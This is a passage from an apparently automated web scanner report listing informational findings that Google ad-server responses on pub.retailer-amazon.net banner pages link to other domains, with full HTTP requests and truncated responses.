3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtwWDCnkP1am4XiC_5n1P5ao4AdRrg%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.432. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681270&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663270172&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303663270174&frm=1&adk=2614322350&ga_vid=653387941.1303663270&ga_sid=1303663270&ga_hid=1520209509&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895130&fu=4&ifi=1&dtd=4 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keywa6d4b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:41:07 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14745

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DManage%2BBlade%2BServer%26adU%3Dwww.doubletake.visionsolutions.com%26adT%3DVirtualization%2BWhitepaper%26adU%3Dwww.host.net%26adT%3DHosted%2BServer%2B%2526amp%253B%2BStorage%26adU%3Dwww.coolcapitals.com%26adT%3DRestaurants%2BIn%2BAntwerp%26adU%3Dtripplite.com/CoolingSolution%26adT%3DPortable%2BAC%2BUnit%26gl%3DUS&amp;usg=AFQjCNGpZA3We2Cla71RZL3nq1_GdG1ULg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.433. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680770&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662770546&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662770557&frm=1&adk=2614322350&ga_vid=1659448169.1303662771&ga_sid=1303662771&ga_hid=1026039870&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:32:47 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15008

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BServer%2BSolutions%26adU%3Dwww.bing.com/Local%26adT%3DAtlanta%2BIrish%2BRestaurants%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dtripplite.com/RackSolutions%26adT%3DOpen%2BFrame%2BRacks%26adU%3Dcoastlinemicro.com/rackserver%26adT%3DOptimized%2BRack%2BServer%26gl%3DUS&amp;usg=AFQjCNEw1FHxronXw1eMLKpU19lmaTFBwA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.434. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676440&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658440797&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658440803&frm=1&adk=2614322350&ga_vid=818173477.1303658441&ga_sid=1303658441&ga_hid=928907882&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:20:38 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1506

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><iframe src="http://view.atdmt.com/MRT/iview/302482408/direct;wi.160;hi.600/01/238930674?click=http://googleads.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DB2Z05xT-0TaKrMcjhlQez64SsA-SwnI4C9I7TmxvcrtnbP7DkgAEQARgBINmitw84AFDRxLm5______8BYMnug4jwo-wSsgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RLgCGMACBMgClLCGGKgDAdEDHROmdxAz1pjoA7wB6AOUAvUDAAAAxA%26num%3D1%26sig%3DAGiWqtx-OJWvpbCS73hYg0hYLIULa971Wg%26client%3Dca-pub-6888065668292638%26adurl%3D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600"> <script language="JavaScript" type="text/javascript">
...[SNIP]...

23.435. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676618&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658618176&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658618181&frm=1&adk=2614322350&ga_vid=493609602.1303658618&ga_sid=1303658618&ga_hid=509585208&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895132&fu=4&ifi=1&dtd=9 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:23:35 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15670

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keyword%25257D%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.BarracudaNetworks.com/Webcast%26adT%3DFree%2BSecurity%2BWebinar%26adU%3Dwww.NETGEAR.com/ProSecure%26adT%3DProSecure%2BBy%2BNETGEAR%25C2%25AE%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BIT%2BSecurity%26adU%3Daicpa.org/citpcredential%26adT%3DAICPA%2BCITP%2BCredential%26adU%3Dwww.WatchGuard.com%26adT%3DWeb%2BContent%2BSecurity%26gl%3DUS&amp;usg=AFQjCNHFlFA9sOgbOhqAi255i6JJjU0_Dw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.436. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681758&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663758477&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303663758492&frm=1&adk=2614322350&ga_vid=929714783.1303663758&ga_sid=1303663758&ga_hid=156189427&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=17 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:49:15 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14702

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DSecure%2BServer%26adU%3DNetApp.com/us%26adT%3DData%2BStorage%2Bfor%2BWindows%25C2%25AE%26adU%3DAPC.com/DataCenterUniversity%26adT%3DRack%2BTechnologies%26adU%3Dwww.areasys.com%26adT%3DServers%2Bwith%2BIntel%2BXeon%26adU%3Dtripplite.com/CoolingSolution%26adT%3DCooling%2BSolutions%26gl%3DUS&amp;usg=AFQjCNG-PvAk9_N37tVvz9sDLAL_tXik0w" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.437. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679940&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661940967&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303661940980&frm=1&adk=2614322350&ga_vid=1707812897.1303661941&ga_sid=1303661941&ga_hid=785527466&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=36813005&fu=4&ifi=1&dtd=16 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:18:58 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1832

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=xSCwcmgR6T_FILByaBHpPwAAAEAzMwdAxSCwcmgR6T_FILByaBHpPy8ukoDR0nkkSsYda6b2ziVyTbRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAGw8BAgUCAAQAAAAA_iA2zgAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303661951%29%3Buf%28%27c%27%2C+52368%2C+1303661951%29%3Buf%28%27r%27%2C+173254%2C+1303661951%29%3Bppv%288991%2C+%272628363654794456623%27%2C+1303661951%2C+1303705151%2C+52368%2C+25553%29%3B&cnd=!QxFr_wiQmQMQxskKGAAg0ccBKEsx4pnD62gR6T9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php&pp=TbRNcgAAksgK5XHBLx9eBe9aJqURUMnJyCDqsg&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBboJnck20TcilAsHjlQeFvP34Atfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtwVrMHKKZVemRm5XFLaOSGOVALJPg%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.438. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303680588&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F24%2Fdork%2Freflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-pubretaileramazonnet.html&dt=1303662588652&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303662588660&frm=0&adk=1607234649&ga_vid=1748158399.1303662589&ga_sid=1303662589&ga_hid=875543635&ga_fc=0&u_tz=-300&u_his=18&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&eid=33895130&fu=0&ifi=1&dtd=18&xpc=RlnbVTtwIa&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:29:46 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12699

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/24/dork/reflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-pubretaileramazonnet.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.NetApp.com%26adT%3DVirtualized%2BInfrastructure%26adU%3Dwww.Dell.com/Blades%26adT%3DManage%2BBlade%2BServer%26adU%3Dwww.ServerTech.com%26adT%3DServer%2BPower%2B%2526amp%253B%2BLoad%2BMgmt%26gl%3DUS&amp;usg=AFQjCNGisuDW1K10iNBOkYOgJwnS3d7FDw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.439. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680598&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662598351&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662598363&frm=1&adk=2614322350&ga_vid=76642708.1303662598&ga_sid=1303662598&ga_hid=189217050&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=16 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:29:55 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14863

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DSecure%2BServer%26adU%3Dwww.NetApp.com%26adT%3DNetApp%25C2%25AE%2BIT%2BCalculator%26adU%3Dwww.Microsoft.com/Cloud%26adT%3DWhat%2Bis%2BCloud%2BComputing%253F%26adU%3Dwww.coolcapitals.com%26adT%3DRestaurants%2BIn%2BAntwerp%26adU%3Dwww.quietpcusa.com%26adT%3DXRackPro2%2B25U%2BRackmount%26gl%3DUS&amp;usg=AFQjCNHfpDgqu_FWtFH1VMfDrhf_jfrmfQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.440. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303679733&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F24%2Fdork%2Freflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-trustedidcom.html&dt=1303661733130&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661733142&frm=0&adk=1607234649&ga_vid=6261562.1303661733&ga_sid=1303661733&ga_hid=106039645&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&fu=0&ifi=1&dtd=17&xpc=B3pjxJf2md&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
